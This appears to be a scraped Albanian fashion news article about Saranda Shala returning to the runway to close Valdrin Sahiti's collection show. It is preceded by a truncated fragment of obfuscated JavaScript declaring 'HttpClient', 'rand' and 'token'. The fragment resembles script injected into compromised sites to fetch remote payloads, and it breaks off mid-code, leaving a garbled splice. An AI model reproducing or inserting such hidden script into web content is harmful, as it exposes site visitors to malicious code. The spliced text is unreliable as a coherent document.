;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Saranda Shala në pasarelë na riktheu në kohën e artë të modeleve

By

Në sfilatën e mbrëmshme të koleksionit të ri të Valdrin Sahitit, në mesin e shumë surprizave të bukura, pa diskutim ishte edhe ngjitja në skenë si modele e Saranda Shalës.

Një nga figurat ikonike të sferës kosovare të modelizmit, iu rikthye pasaralës duke bërë mbylljen e sfilatës në mënyrën më të mirë të mundshme me një nga kreacionet e Sahitit.

Përkundër faktit që modelizmi nuk mbetet tashmë profesioni primar i Shalës, minutat e saj në skenë na rikthyen shijen e bukur të kohëve të dikurshme kur modelet, ishin njëmend modele.

Në top-formë, me secilin detaj në perfeksion, Sara na dëshmoi sërish që jo rastësisht, vazhdon të mbahet në mend si një ndër fytyrat që i dha ngjyra ndër vite, botës së modës në Kosovë.

Sarë, mos mungo shpesh! Skena të ka hije si pak kujt tjetër! /Prive.al

Artikuj të ngjashëm